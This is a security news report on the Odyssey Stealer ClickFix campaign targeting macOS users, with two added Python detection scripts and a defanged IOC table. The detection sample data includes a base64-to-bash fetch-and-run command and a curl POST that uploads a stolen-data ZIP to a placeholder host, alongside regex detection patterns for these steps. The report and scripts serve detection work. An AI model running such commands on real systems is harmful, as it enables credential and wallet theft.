Threat Actors Use Clickfix Tactics to Deploy Malicious AppleScripts for Stealing Login Credentials

The CYFIRMA research team has identified a sophisticated cybercrime campaign leveraging Clickfix tactics to deliver malicious AppleScripts (osascripts) aimed at macOS users. 

The operation, attributed to the Odyssey Stealer malware family, employs typosquatted domains resembling legitimate finance, Apple App Store, and cryptocurrency news sites to lure unsuspecting victims. 

This campaign is primarily focused on harvesting browser cookies, saved passwords, cryptocurrency wallet data, and sensitive browser plugin information from individuals interested in finance and digital assets.

Technical Analysis of the Attack Chain

The attack begins when a user inadvertently visits a typosquatted website crafted to mimic trusted domains. Upon landing, visitors are presented with a fake Cloudflare CAPTCHA prompt. 

Below this, macOS users are instructed to copy a Base64-encoded command and execute it in the terminal. 

[Figure: Clickfix lure on a typosquatted macOS App Store domain]

This command fetches and runs a lengthy, albeit unobfuscated, AppleScript from a remote command-and-control (C2) server, such as odyssey1[.]to or 45[.]135.232.33.

Once executed, the AppleScript displays a deceptive authentication prompt to capture the user’s password. 

The script then uses the macOS dscl utility with the authonly parameter to silently validate and harvest the credentials, keeping the malicious activity hidden from the victim. 

The script also creates a temporary directory (e.g., /tmp/lovemrtrump) to store exfiltrated data, including macOS keychain files, browser data, and documents.

Comprehensive Data Exfiltration

Odyssey Stealer is engineered to target a wide array of data sources:

  • Browsers: It extracts saved passwords, payment information, browsing history, and session cookies from Chrome, Chromium-based browsers (Brave, Edge, Opera), Firefox, and Safari.
  • Cryptocurrency Wallets: The malware specifically targets desktop wallets (Electrum, Coinomi, Exodus) and browser extensions (MetaMask, etc.), stealing private keys and seed phrases.
  • Personal Files: It searches for and exfiltrates files with extensions such as .txt, .pdf, .docx, .jpg, .png, .rtf, and .kdbx from the user’s Desktop and Documents folders.

All collected data is compressed into a ZIP archive and transmitted to attacker-controlled servers using a curl POST request. 

The exfiltration routine is built to survive network failures: it retries the upload up to ten times before giving up.
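The attack chain above (Base64 command pasted into the terminal, an AppleScript that validates the captured password with dscl -authonly, staging under /tmp, then a curl POST of the ZIP archive) leaves a distinctive process lineage. The following detection logic is an added example, not code from CYFIRMA or Cyber Press; it runs over constructed process-execution events whose field names (ts, pid, ppid, parent, process, args) are an assumption standing in for whatever an EDR or Endpoint Security feed emits. The C2 URL inside the sample Base64 blob is a placeholder, not an indicator from the report.

```python
"""Detect the Odyssey Stealer ClickFix execution chain in process telemetry.

Added example: the events are constructed, the schema is assumed, and the
rules key on behaviour described in the report rather than on infrastructure.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcEvent:
    ts: str
    pid: int
    ppid: int
    parent: str   # name of the parent process as recorded by the sensor
    process: str
    args: str


# Constructed: the Base64 blob a victim would paste. Encoded at import time so
# the sample is a valid encoding; c2.invalid is a placeholder, not a real C2.
PASTED_B64 = base64.b64encode(b"curl -s http://c2.invalid/x | osascript").decode()

# Constructed telemetry: the chain from the report, plus benign osascript/curl
# noise that a naive "alert on osascript" rule would false-positive on.
SAMPLE_EVENTS = [
    ProcEvent("12:00:01", 501, 400, "Terminal", "bash", f"-c echo {PASTED_B64} | base64 -d | bash"),
    ProcEvent("12:00:02", 502, 501, "bash", "curl", "-s http://c2.invalid/x"),
    ProcEvent("12:00:02", 503, 501, "bash", "osascript", ""),
    ProcEvent("12:00:05", 504, 503, "osascript", "dscl", ". -authonly alice Hunter2!"),
    ProcEvent("12:00:06", 505, 503, "osascript", "mkdir", "-p /tmp/lovemrtrump"),
    ProcEvent("12:00:09", 506, 503, "osascript", "zip", "-r /tmp/lovemrtrump/out.zip /tmp/lovemrtrump"),
    ProcEvent("12:00:10", 507, 503, "osascript", "curl", "-X POST -F file=@/tmp/lovemrtrump/out.zip http://c2.invalid/log"),
    ProcEvent("12:05:00", 600, 300, "Script Editor", "osascript", "backup.scpt"),
    ProcEvent("12:06:00", 601, 300, "zsh", "curl", "-X POST https://api.example.com/v1"),
]

# macOS base64 accepts -d, -D and --decode; the pipe target is a shell.
B64_PIPE_RE = re.compile(r"base64\s+(?:-[dD]|--decode)\b.*\|\s*(?:sh|bash|zsh)\b")
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
CURL_UPLOAD_RE = re.compile(r"(?:-X\s*POST|-F\s+\S*@/tmp/|--data-binary\s+@/tmp/)")


def decode_pasted_payload(args: str) -> Optional[str]:
    """Return the decoded Base64 payload if args pipe one into a shell, else None."""
    if not B64_PIPE_RE.search(args):
        return None
    for tok in B64_TOKEN_RE.findall(args):
        try:
            return base64.b64decode(tok, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue
    return ""  # piped decode seen, but no decodable blob recovered


def has_ancestor(ev: ProcEvent, by_pid: dict, name: str, max_depth: int = 8) -> bool:
    """Walk the pid/ppid chain looking for a process called `name`."""
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return cur.parent == name  # fall back to the sensor's parent name
        if parent.process == name:
            return True
        cur = parent
    return False


def detect(events: List[ProcEvent]) -> List[dict]:
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        payload = decode_pasted_payload(e.args)
        if payload is not None:
            sev = "high" if re.search(r"\b(?:curl|osascript)\b", payload) else "medium"
            alerts.append({"rule": "base64_pipe_to_shell", "pid": e.pid,
                           "severity": sev, "detail": payload[:80]})
        if e.process == "dscl" and "-authonly" in e.args and has_ancestor(e, by_pid, "osascript"):
            # The plaintext password is the last argument: redact it before the
            # alert reaches a SIEM, otherwise the detection itself leaks it.
            redacted = re.sub(r"(-authonly\s+\S+\s+)\S+", r"\1<redacted>", e.args)
            alerts.append({"rule": "dscl_authonly_from_osascript", "pid": e.pid,
                           "severity": "high", "detail": redacted})
        if e.process == "curl" and CURL_UPLOAD_RE.search(e.args) and has_ancestor(e, by_pid, "osascript"):
            alerts.append({"rule": "curl_post_from_osascript", "pid": e.pid,
                           "severity": "high", "detail": e.args})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The three rules fire on the sample chain (pids 501, 504 and 507) and stay silent on the Script Editor and developer-curl events because they key on lineage (an osascript ancestor) and on the decoded content of the pasted command, not on the process names alone.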

[Figure: the AppleScript (osascript) payload fetched by the Clickfix command]

Odyssey Stealer has evolved from the Poseidon Stealer, itself a fork of the AMOS Stealer, and is actively maintained by actors associated with Russian cybercriminal forums. 

According to the CYFIRMA report, the malware is offered as a service, with a web-based control panel that lets operators manage stolen data, configure payloads, and monitor infected devices. 

The campaign predominantly targets users in Western countries while deliberately avoiding CIS nations, a hallmark of Russian-aligned threat groups.

The Odyssey Stealer campaign demonstrates a high level of technical sophistication in targeting macOS users, particularly those in the finance and cryptocurrency sectors. 

By leveraging social engineering and technical exploits, the attackers are able to harvest sensitive credentials and financial data at scale. 

Organizations and end-users are urged to remain vigilant, restrict the execution of AppleScripts, and implement robust endpoint and network security controls to mitigate the risk of compromise.

Indicators of Compromise (IOC)

| Indicator | Type | Remarks |
|---|---|---|
| appmacosx[.]com | Domain | Malicious domain |
| financementure[.]com | Domain | Malicious domain |
| appsmacosx[.]com | Domain | Malicious domain |
| macosxapp[.]com | Domain | Malicious domain |
| macosapp-apple[.]com | Domain | Malicious domain |
| macapps-apple[.]com | Domain | Malicious domain |
| macapp-apple[.]com | Domain | Malicious domain |
| republicasiamedia[.]com | Domain | Malicious domain |
| emailreddit[.]com | Domain | Malicious domain |
| appmacintosh[.]com | Domain | Malicious domain |
| cryptoinfo-news[.]com | Domain | Malicious domain |
| macosxappstore[.]com | Domain | Malicious domain |
| macosx-apps[.]com | Domain | Malicious domain |
| macxapp[.]org | Domain | Malicious domain |
| cryptonews-info[.]com | Domain | Malicious domain |
| cryptoinfnews[.]com | Domain | Malicious domain |
| 188[.]92.28.186 | IP Address | Malicious infrastructure |
| 45[.]144.233.192 | IP Address | Malicious infrastructure |
| 83[.]222.190.250 | IP Address | Malicious infrastructure |
| 185[.]39.206.183 | IP Address | Malicious infrastructure |
| odyssey1[.]to | Domain/C2 | Odyssey C2 Panel |
| 45[.]135.232.33 | IP Address/C2 | Odyssey C2 Panel |
| odyssey-st[.]com | Domain/C2 | Odyssey C2 Panel |
| a0bdf6f602af5efea0fd96e659ac553e0e23362d2da6aecb13770256a254ef55 | File Hash | Malicious AppleScript |
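Indicators are published defanged (`[.]` in place of `.`), so they have to be normalised before they can be matched against DNS, proxy or firewall logs. The script below is an added example, not CYFIRMA's or Cyber Press's tooling: it refangs and classifies the indicators from the table above, then sweeps constructed DNS-query and connection log lines whose format (key=value fields) is an assumption. Subdomains of a listed domain are treated as hits, since lures are often served from a host under the registered domain.

```python
"""Refang the report's IOCs and sweep sample logs for them.

Added example. The IOC rows are copied from the report's table; the log lines
and their key=value layout are constructed for the demo.
"""
import ipaddress
import re
from typing import Dict, List, Set, Tuple

REPORT_IOCS = [
    "appmacosx[.]com", "financementure[.]com", "appsmacosx[.]com", "macosxapp[.]com",
    "macosapp-apple[.]com", "macapps-apple[.]com", "macapp-apple[.]com",
    "republicasiamedia[.]com", "emailreddit[.]com", "appmacintosh[.]com",
    "cryptoinfo-news[.]com", "macosxappstore[.]com", "macosx-apps[.]com",
    "macxapp[.]org", "cryptonews-info[.]com", "cryptoinfnews[.]com",
    "188[.]92.28.186", "45[.]144.233.192", "83[.]222.190.250", "185[.]39.206.183",
    "odyssey1[.]to", "45[.]135.232.33", "odyssey-st[.]com",
    "a0bdf6f602af5efea0fd96e659ac553e0e23362d2da6aecb13770256a254ef55",
]

# Constructed sample logs. 203.0.113.7 is documentation space (TEST-NET-3).
SAMPLE_DNS_LOG = [
    "2025-07-01T12:00:00Z client=10.0.0.5 query=www.appmacosx.com type=A",
    "2025-07-01T12:00:01Z client=10.0.0.5 query=www.apple.com type=A",
    "2025-07-01T12:00:03Z client=10.0.0.5 query=odyssey1.to. type=A",
]
SAMPLE_CONN_LOG = [
    "2025-07-01T12:00:10Z src=10.0.0.5 dst=45.135.232.33 dport=80 proto=tcp",
    "2025-07-01T12:00:11Z src=10.0.0.5 dst=203.0.113.7 dport=443 proto=tcp",
]


def refang(ioc: str) -> str:
    """Undo the common defanging conventions so the value matches real logs."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").strip().lower()


def classify(ioc: str) -> str:
    """Classify an indicator as ip, domain, sha256 or unknown after refanging."""
    v = refang(ioc)
    try:
        ipaddress.ip_address(v)
        return "ip"
    except ValueError:
        pass
    if re.fullmatch(r"[0-9a-f]{64}", v):
        return "sha256"
    if re.fullmatch(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", v):
        return "domain"
    return "unknown"


def build_index(iocs: List[str]) -> Dict[str, Set[str]]:
    idx: Dict[str, Set[str]] = {"ip": set(), "domain": set(), "sha256": set()}
    for raw in iocs:
        kind = classify(raw)
        if kind in idx:
            idx[kind].add(refang(raw))
    return idx


DNS_QUERY_RE = re.compile(r"query=(?P<name>\S+)")
CONN_DST_RE = re.compile(r"dst=(?P<ip>\d{1,3}(?:\.\d{1,3}){3})")


def scan_dns_log(lines: List[str], idx: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Return (queried name, matched indicator) for exact or subdomain matches."""
    hits = []
    for line in lines:
        m = DNS_QUERY_RE.search(line)
        if not m:
            continue
        name = m.group("name").rstrip(".").lower()
        labels = name.split(".")
        # Try the full name, then each parent domain down to the registrable one.
        for i in range(len(labels) - 1):
            candidate = ".".join(labels[i:])
            if candidate in idx["domain"]:
                hits.append((name, candidate))
                break
    return hits


def scan_conn_log(lines: List[str], idx: Dict[str, Set[str]]) -> List[str]:
    """Return destination IPs that appear in the indicator set."""
    return [m.group("ip") for m in map(CONN_DST_RE.search, lines)
            if m and m.group("ip") in idx["ip"]]


if __name__ == "__main__":
    index = build_index(REPORT_IOCS)
    print(scan_dns_log(SAMPLE_DNS_LOG, index))
    print(scan_conn_log(SAMPLE_CONN_LOG, index))
```

The trailing-dot and case handling in scan_dns_log matters in practice: resolver logs often record the fully qualified name with a terminal dot, and a byte-exact comparison against the published indicator would miss it.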

Kaaviya
Kaaviya is a Security Editor and reporter with Cyber Press (https://cyberpress.org/), covering cyber security incidents across cyberspace.
